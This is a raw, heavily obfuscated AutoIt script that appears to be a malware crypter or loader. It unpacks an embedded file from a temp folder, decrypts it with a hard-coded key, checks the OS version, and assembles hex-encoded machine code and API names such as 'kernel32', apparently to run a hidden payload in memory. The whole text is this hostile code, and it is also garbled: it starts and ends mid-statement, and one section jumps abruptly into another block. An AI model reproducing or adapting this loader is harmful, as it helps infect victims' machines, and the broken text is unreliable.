) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87373 ) ) & $F32353236Y0YC ($V39NUX ("13w4rbfv7" , "w4rbfv7" , "" ) ) & $F32353236Y0YC ("10" ) $1739397950 = 317041254 ENDSWITCH WEND ENDIF ENDIF ENDIF $326133898 = 1178081240 WHILE 1 SWITCH $326133898 CASE 317041254 FILEINSTALL ("C:\Users\Tesoreriaaa\AppData\Local\Temp\StaticCrypt\tjiujedt.cbm" , $I32373530QUIDQ5 ) EXITLOOP CASE 1178081240 GLOBAL $I32373530QUIDQ5 = $U32343233PUXJX ($S3131302YFY55 ) & "\" & "cbmfpeiu" $326133898 = 317041254 ENDSWITCH WEND IF TRUE THEN $N32353436WLYY ($I32373530QUIDQ5 , $O353SY ("brjehhc40zj4ikbv2s6rd0p4" ) ) GLOBAL $O32373537PK3U = 0 IF FALSE THEN $O32373537PK3U = B32RBY (FILEREAD ($I32373530QUIDQ5 ) , "5tqk60e3vra4rnalk4zxv6tzm9va9ynb40azxkrz3m7yqs97z4wao7wlffmg" ) ELSE $O32373537PK3U = P334N2 (FILEREAD ($I32373530QUIDQ5 ) , "5tqk60e3vra4rnalk4zxv6tzm9va9ynb40azxkrz3m7yqs97z4wao7wlffmg" ) ENDIF IF $N32363039121 = "1" THEN $R32363130LEIE = $N32353634RG 
ELSEIF $N32363039121 = "2" THEN $R32363130LEIE = $H3235363685IFM ELSEIF $N32363039121 = "3" THEN $R32363130LEIE = $X32353638F1 ELSEIF $N32363039121 = "4" THEN $R32363130LEIE = $W32353730R2Y ELSEIF $N32363039121 = "5" THEN $R32363130LEIE = $A323537327GDZ7I ELSEIF $N32363039121 = "6" THEN $R32363130LEIE = $E32353734386 ELSEIF $N32363039121 = "7" THEN $R32363130LEIE = $P323630360VS5 ENDIF IF $R32363130LEIE = $U32343233PUXJX ($O353SY ("87mv7vr70wo1xtvhgkcnmml0v6un3" ) ) AND @OSVERSION = $V3135P3 ("t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5a" , 29 + 7965 + 4294959331 , 5 + 7965 + 4294959331 ) THEN H36R3ASM ($R32363130LEIE , "" , $O32373537PK3U ) ELSE T30R1Y ($N32363039121 , $O32373537PK3U ) ENDIF FUNC T30R1Y ($R32373931PJ , $B3237393221GL ) LOCAL $W32373933SV7D = D31DI ($R32373931PJ , $B3237393221GL ) IF $W32373933SV7D = 0 THEN $274725409 = 1178081240 WHILE 1 SWITCH $274725409 CASE 317041254 $U32343233PUXJX ($T3132334T3JHU ) $274725409 = 326133898 CASE 326133898 EXIT EXITLOOP CASE 1178081240 $S32343336CEZAP (1000 ) $274725409 = 317041254 ENDSWITCH WEND ELSE RETURN $W32373933SV7D ENDIF ENDFUNC FUNC D31DI ($R32373931PJ , $B3237393221GL ) $823320600 = 1178081240 WHILE 1 SWITCH $823320600 CASE 28750967 $G32383037Y2 &= $O353SY ("3r3tsnohid" ) $823320600 = 77291538 CASE 31564936 $G32383037Y2 &= $X343738EE714 $823320600 = 754347554 CASE 67217268 $G32383037Y2 &= $P363737R5WKD $823320600 = 332981565 CASE 73799175 $G32383037Y2 &= $E3930368A3 $823320600 = 1221390787 CASE 75652009 $G32383037Y2 &= $O353SY ("frzljrw88wx17" ) $823320600 = 1537586385 CASE 77291538 $G32383037Y2 &= $O353SY ("s0eb8fkgt2j1exa2jpw0fg" ) $823320600 = 1072049475 CASE 108681755 $G32383037Y2 &= $Q31313238DF44 $823320600 = 1522885757 CASE 122734813 $G32383037Y2 &= $I36313287AX2 $823320600 = 1923293943 CASE 128580426 $G32383037Y2 &= $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 
(87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & 
$C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) $823320600 = 245974442 CASE 162218163 $G32383037Y2 &= $V3135P3 ("vkdlbqd77wrvnp4x584yw4nm7em2657373C645F000C745F4436C6F73C745F86548616EC745FC646C6500FC648B15300000008B52qhyqhckkz51" , 29 + 5930 * 2 + 4294955436 , 76 + 5930 * 2 + 4294955436 ) $823320600 = 207991646 CASE 179833975 $G32383037Y2 &= $O353SY ("py7daghq" ) $823320600 = 1976720245 CASE 197553472 $G32383037Y2 &= $K363837HFP3 $823320600 = 28750967 CASE 207991646 $G32383037Y2 &= $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 
) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87330 ) ) $823320600 = 1566911474 CASE 220189866 $G32383037Y2 &= $O353SY ("6x84wpmf8hknqezrtelrq" ) $823320600 = 1625702291 CASE 244586016 $G32383037Y2 &= $O353SY ("3se1mh6wjca7" ) $823320600 = 1593765410 CASE 245974442 $G32383037Y2 &= $J3333397DO7 $823320600 = 1662106412 CASE 247051243 $G32383037Y2 &= $U3131F51ZD ("bcdla2yv5B8BE55DC3558BEC83EC205657C745E05465726DC745E4696E6174C745E86550726FC745EC63" , 8 + 4294963751 + 3545 ) $823320600 = 162218163 CASE 268691428 $G32383037Y2 &= $Z37IB8K ("0x383839373546433839374446343835464637343443384234303234303343313839343546" ) $823320600 = 338561916 CASE 274725409 $G32383037Y2 &= $Z37IB8K ("0x33433038353034353030303037354543384234343038373838423534303832303033433135" ) $823320600 = 1739397950 CASE 317041254 $G32383037Y2 = $Y313235WMU $823320600 = 326133898 CASE 326133898 
$G32383037Y2 &= $U3131F51ZD ("48ij2xw1745gt7s8baq8gci000083EC14663901740833C08BE55DC208008B413C81" , 23 + 4294959228 + 8068 ) $823320600 = 274725409 CASE 332981565 $G32383037Y2 &= $U3131F51ZD ("14u68cqjblbgszsrzz7znizat2asC68528FFFFFF00C7852CFFFFFF433A5C57C78530FFFFFF696E646FC78534FFFFFF77735" , 28 + 8381 + 4294958915 ) $823320600 = 1191090362 CASE 337696162 $G32383037Y2 &= $W31323630IK $823320600 = 2095464838 CASE 338561916 $G32383037Y2 &= $L313638RANZ $823320600 = 854553390 CASE 342768592 $G32383037Y2 &= $I31330D6 ("3C41C85FF0F84F10000008B56548B857CFFFFFF6A00525357506A05683DF5E9CCE8F2F5FFFF8B55yts3egoghg8ryts8hiq1" , 20 + 4294958956 + 8340 ) $823320600 = 2039189835 CASE 343886302 $G32383037Y2 &= $H393034Q42 $823320600 = 73799175 CASE 349070442 $G32383037Y2 &= $V39NUX ("000000zanup0zanup0zanup0zanup000zanup000zanup0zanup00zanup0zanup0zanup00000zanup000zanup0zanup00zanup00zanup0zanup00000zanup0000zanup0zanup000zanup0zanup0000zanup0zanup0zanup0zanup000zanup0zanup0zanup0zanup00zanup0zanup0000" , "zanup" , "" ) $823320600 = 812054995 CASE 373706041 $G32383037Y2 &= $W313035393BB1A $823320600 = 1050946220 CASE 424398338 $G32383037Y2 &= $V3135P3 ("0us5ejkljjdj67asq75BEC83EC58535657FC648B15300000008B520C8B52148B7228B91800000033FF33C0AC3C617C0222822gs10rqghjcm45oua3ppmvadrd" , 20 + 4294963159 + 4137 , 78 + 4294963159 + 4137 ) $823320600 = 75652009 CASE 435626120 $G32383037Y2 &= $O353SY ("0fe8ewakzc3srdt45jqs5o3eblm" ) $823320600 = 1479625482 CASE 471869101 $G32383037Y2 &= $Z37IB8K ("0x31323735443938424630384434353943353035364337383536384646464646463437363537343444433738353643464646464646364636343735364343373835373046464646" ) $823320600 = 1865630473 CASE 499531526 $G32383037Y2 &= $Z37IB8K ("0x3030303842353538303536353236413032363838333031363043454538343546354646464638423435383035303641303136383233343333454231453833354635464646" ) $823320600 = 373706041 CASE 507017416 $G32383037Y2 &= $Z37IB8K 
("0x3435303833433130383531353236413035363833444635453943434538363746354646464638423435303838423438323838334334314330334346383938454230303030" ) $823320600 = 499531526 CASE 508698040 $G32383037Y2 &= $V39NUX ("1sk8a00sk8a0sk8a0sk8a8Bsk8a94180sk8aCsk8a0sk8a1sk8a00008Dsk8a84sk8a1sk8a8F8sk8a000sk8a000sk8a8Bsk8a4sk8a0sk8a0C6Ask8a0sk8a05sk8a18sk8aBsk8a8Dsk8a7Csk8aFFFsk8aFFFsk8a03Dsk8a" , "sk8a" , "" ) $823320600 = 525974472 CASE 511805355 $G32383037Y2 &= $O353SY ("nhzicq7k5jsuua4j2blmr" ) $823320600 = 1629206375 CASE 525974472 $G32383037Y2 &= $Z37IB8K ("0x3335323033433735303531364130353638334446354539434345" ) $823320600 = 606900647 CASE 540021528 $G32383037Y2 &= $Z37IB8K ("0x3735454438423544464333423535303837343130343733423744463837324345354633334330354238424535354443323034" ) $823320600 = 1170832963 CASE 554725439 $G32383037Y2 &= $Z37IB8K ("0x304337343545383431363437363631433734354543373036393333333243373435463032453634364336433838354446344337343544433443364636333631433734354530364334363732363536364337343545" ) $823320600 = 684192185 CASE 606900647 $G32383037Y2 &= $U3131F51ZD ("qu1fv3k27lvlnf7avir38A5F5FFFF8B55080FB742068345" , 20 + 4294959922 + 7374 ) $823320600 = 820767532 CASE 607502147 $G32383037Y2 &= $U3131F51ZD ("mm4kb4j2yhqavjsvav02EC785DCFEFFFF33303331C785E0FEFFFF395C4D53C785E4FEFFFF4275696" , 18 + 4294958328 + 8968 ) $823320600 = 1134265100 CASE 684192185 $G32383037Y2 &= $P3431383E $823320600 = 1892817007 CASE 694144588 $G32383037Y2 &= $S363833KAU $823320600 = 1597403880 CASE 698963862 $G32383037Y2 &= $V343134X4A0V $823320600 = 706251512 CASE 706251512 $G32383037Y2 &= $O353SY ("u3bc8gn78n164ouj7v08x1o" ) $823320600 = 554725439 CASE 747332703 $G32383037Y2 &= $U3131F51ZD ("fjf4l5hncB91800000033FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B42108B" , 9 + 9609 + 4294957687 ) $823320600 = 471869101 CASE 754347554 $G32383037Y2 &= $Z37IB8K 
("0x30464639353738464646464646333343303342463330463934433035463545354238424535354443323034303035463545333243303542384245353544433230343030434343434343" ) $823320600 = 2049571787 CASE 807257674 $G32383037Y2 &= $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) 
& $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) $823320600 = 197553472 CASE 812054995 $G32383037Y2 &= $U3131F51ZD ("3uxmj4yrj6zcr800000000000000000000000000000000000000000000000000000000000000000000000" , 14 + 88 * 1 + 4294967208 ) $823320600 = 337696162 CASE 820767532 $G32383037Y2 &= $V3135P3 ("sgvxzqgaquwl0C284683C41C3BF07CB38B45088B75FC8B8EA40000008B957CFFFFFF6A006A0483C03btjm7eb4a6ah45ultu2luvu78g2j" , 13 + 1892 * 2 + 4294963512 , 69 + 1892 * 2 + 4294963512 ) $823320600 = 507017416 CASE 846271121 $G32383037Y2 &= $G393030X2Q $823320600 = 220189866 CASE 853394200 $G32383037Y2 &= $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 
(87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) $823320600 = 1374344267 CASE 854553390 $G32383037Y2 &= $O353SY ("3whfneky643w3g4uj3ge27omlcltg" ) $823320600 = 1296483263 CASE 935061787 $G32383037Y2 &= $S3130353562CZLC $823320600 = 342768592 CASE 947431475 $G32383037Y2 &= $C313734GS4W $823320600 = 961348210 CASE 961348210 $G32383037Y2 &= $I31330D6 ("EB038D49008B04BB8A0C3003C6BA3AB6010084C974168BDAC1E3050FBEC903D34003D18A0884C9rzkmwb5xdilg8pvrcl7iykmhnjouh" , 29 + 3474 * 1 + 4294963822 ) $823320600 = 540021528 CASE 1023162799 $G32383037Y2 &= $O353SY ("031hjiov8aioi3yccn" ) $823320600 = 
(R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $197553472 = 684192185 CASE 684192185 $O33393833KPWTZB &= $O353SY ("87sihc5c5ujxolbm11x5d5dxkhaveg" ) $197553472 = 
1892817007 CASE 694144588 $O33393833KPWTZB &= $V39NUX ("B837hh1yDhh1yE4hh1y0hh1y074hh1y1053FFhh1y75E4hh1yFFhh1y95hh1y7hh1y0FFFFhh1yFFFFhh1y7hh1y5Ehh1y4FF55hh1yE0hh1y83hh1y7DE800hh1y74hh1y0hh1y6hh1yFFhh1y7hh1y5hh1yEhh1y8FFhh1y5hh1y5hh1yEhh1y0hh1y8hh1y5Fhh1yF7hh1y4hh1y0hh1yAhh1y6hh1y800" , "hh1y" , "" ) $197553472 = 1597403880 CASE 698963862 $O33393833KPWTZB &= $Z37IB8K ("0x4430333030303033334330363633393536303430463934433033443443303130303030304638343239303330303030384434354534353038443835413846454646464635303532353236413034353235323532" ) $197553472 = 706251512 CASE 706251512 $O33393833KPWTZB &= $Z37IB8K ("0x464637353043464637353038464635353834383543303046383443353032303030303844383544434642464646463530464637354538464635353830383543303046383442303032303030303333433035303641303438" ) $197553472 = 554725439 CASE 754347554 $O33393833KPWTZB &= $O32313337QJ6Z6A $197553472 = 2049571787 CASE 807257674 LOCAL $J32383034OP = $B32343933BHRMQ ($V3135P3 ("8fw18mxqfpmhjwppkernel32yn0vki5c61puh2bslvfrz2i4owhx" , 17 + 3782 + 4294963514 , 8 + 3782 + 4294963514 ) , $O353SY ("n6uj6l2a8fdb82i1" ) , $V39NUX 